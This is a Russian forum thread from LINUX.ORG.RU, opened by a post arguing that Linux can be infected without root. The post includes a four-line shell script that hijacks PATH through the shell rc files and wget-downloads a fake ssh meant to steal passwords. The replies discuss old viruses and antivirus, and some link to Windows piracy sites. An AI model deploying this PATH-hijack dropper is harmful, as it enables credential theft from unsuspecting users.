LINUX.ORG.RU
ФорумTalks

линукс готов для вирусов?


0

0

решил таки проверить, насколько линукс готов для вирусов.
дано: статья о том, почему на линукс нет и не может быть вирусов, ноутбук с линуксом, текстовый редактор, консоль.
доказать: можно ли исполнить более -менее вредоносный скрипт (НЕ деструктивные функции) без прав рута.
итак, что мы можем сделать без рутовых прав?
1) снести хомяк юзера. не интересно.
2) стырить конфигурационные файлы юзера со сверхсекретнымиданными^Wзашифрованными пятью алгоритмами пароли. да кому же из вирусописателей оно сдалось?
3) подменить вызов системной программы на себя. а что может быть проще этого?
итак, злоумышленник захотел подменить, допустим, ssh.
да легко!
#!/bin/sh
cd
mkdir .bin 2>/dev/null
for i in $(ls -1 *shrc 2>/dev/null); do echo «PATH='~/.bin:/bin:/usr/bin:/sbin:/usr/sbin'» >> $i; done
wget -qO ~/.bin/ssh http://...
и всё! вместо настоящего ssh можно запустить что угодно, тот же баш-скрипт, который будет вопрошать пароль да сливать куда -нибудь, потом просто вызывать /usr/bin/ssh $*.
теперь встает другой вопрос - как подсунуть этот «файл» в четыре строчки по тырнетам.
тут вариантов тоже немного -
1) спрятать их в десяти-тысяче-строчный «полезный» шелл-скрипт ;
2) распространять отдельным исполняемым файлом.
в 1м случае понятно, юзер сам запустит скрипт. а во 2м - как же юзер-НЕхомячок запустит скрипт? ведь браузеры при скачке не дают прав на исполнение! после недолгих экспериментов выяснилось, что при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки. (т.е. если кто-то упаковал скрипт с правами на исполнение в архив tar.bz(2), то распаковываемый файл будет с теми же правами, что и до архивации - разве так должно быть?)
а после этого двух кликов достаточно, чтобы «установить» этот скрипт.
«вот такие пироги.» (с)

★★★★★
подтверждение подлинности пользователя ЛОРа (толксов :)
16.08: Дни рождения IE, debian и меня.
1 2 3
Ответ на: комментарий от annulen

> Чернобыль вроде редко проявлялся...

редко, но довольно обильно.

isden ★★★★★
()
Ответ на: комментарий от annulen

>Чернобыль вроде редко проявлялся...

Да ладно. Во все дыры торчал своим процессом :) Мы его чистили задолго до того, как его стали антивирусы понимать.

KRoN73 ★★★★★
()
Ответ на: комментарий от Xenesz

Нет левых ехешников в процессах и авторанах. Стоит обновляемый антивирус. Нет активности в фаерволе и подозрительных процессов.

FiXer ★★☆☆☆
()
Ответ на: комментарий от isden

> у тебя максимальная кстати честнокупленная? :)

из предположения, что в тред внимательно читает ФСБ - конечно же честнокупленная. Никакого пиратства, никакого патча биоса, никаких мини-КМС, никаких плюшек экстримпатчера... В общем, всё как у белых людей ;)

stevejobs ★★★★☆
()
Ответ на: комментарий от FiXer

Тем более я сижу из под обычного юзера :)

FiXer ★★☆☆☆
()
Ответ на: комментарий от isden

даже, скажу больше:

* никакого вареза (http://forum.ru-board.com/topic.cgi?forum=35&topic=46670&start=760#lt),
* никакого патченого биоса (http://forum.ru-board.com/topic.cgi?forum=55&topic=10521&start=960#lt),
* никаких плюшек экстрипатчера (http://forum.ru-board.com/topic.cgi?forum=55&topic=10277&start=2&limit=1#1),
* никаких мини-кмс (http://forum.ru-board.com/topic.cgi?forum=35&topic=47389&start=120#lt),
* и вообще никакого пиратства! (http://thepiratebay.org)

не воруйте у Microsoft, это незаконно :)

stevejobs ★★★★☆
()
Ответ на: комментарий от stevejobs

> Извините, гости не могут заходить в этот форум. Пожалуйста зарегистрируйтесь!.

Некомильфо такие сцылы давать. -)

Reaper ★★
()
Ответ на: комментарий от Reaper

> Некомильфо такие сцылы давать. -)

ну, вынужденная предосторожность. Батько ця (которому не нужно реги) так MS вообще затравили, пришлось на главной странице выкладывать фоточки кошек и просить слово Ky при запуске ;)
(http://wzor.net/, рега не требуется).

всем региться на руборде, это общемировой центр windows-пиратства.

stevejobs ★★★★☆
()
Ответ на: комментарий от KRoN73

Если ничего этого нет в течении нескольких лет, то можно с уверенностью полагать, что вирусы

неактивны. Остальное - допущения. Были же «Пятница, 13-е» и какой-то виряк, взведённый на определённую дату.

Xenesz ★★★★
()
Ответ на: комментарий от Xenesz

> неактивны. Остальное - допущения. Были же «Пятница, 13-е» и какой-то виряк, взведённый на определённую дату.

Сейчас вирусы, которые портят данные, очень редки. Они ж все теперь пытаются украсть информацию, спам рассылать и прочее. Им выгоднее иметь рабочую машину под контролем, чем удалить все файлы или поломать что-то.

smh ★★★
()
Ответ на: комментарий от stevejobs

> этого недостаточно жэ ;) Можно написать какой-нибудь тысячестраничный патч для проги, который якобы что-то делает, а в середину патча вписать всё что хочешь.

Патчи тоже смотреть. Если смущает — исключить его (:

pevzi ★★★★★
()

решил таки проверить, насколько линукс готов для вирусов.

Я ничего не понел из всех этих умных букв и слов.

Скажите мне пожалуйста, если я завтра блондинке-подружке поставлю Убунту (с настройками искоробки), то ее уютненький ноут может легко быть превращен в бот-компутер, пароли от вконтактика стыряни из Фурфикса, пароль из Пидгина от асечки тоже тю-тю?

Или што вы имеете в виду?

Потому что я уже Маше рассказал, что «Под Линукс нет заразы и Др. Вэб нагло врет!» и она согласилась.

the_warlick
()
Ответ на: комментарий от Heretique

> Машенька будет читать пкгбилды и смотреть патчи.

можно их просто не смотреть.

stevejobs ★★★★☆
()
Ответ на: комментарий от Heretique

Я серъезно говорю, не троллю. Ей надоели локеры и я сдуру (по синьке) рассказал ей про Бубунту. Даже скриншоты показал няшные.

the_warlick
()
Ответ на: комментарий от Xenesz

>Были же «Пятница, 13-е» и какой-то виряк, взведённый на определённую дату.

Но все они были прекрасно заметны в системе.

KRoN73 ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2 3
подтверждение подлинности пользователя ЛОРа (толксов :)
Talks
16.08: Дни рождения IE, debian и меня.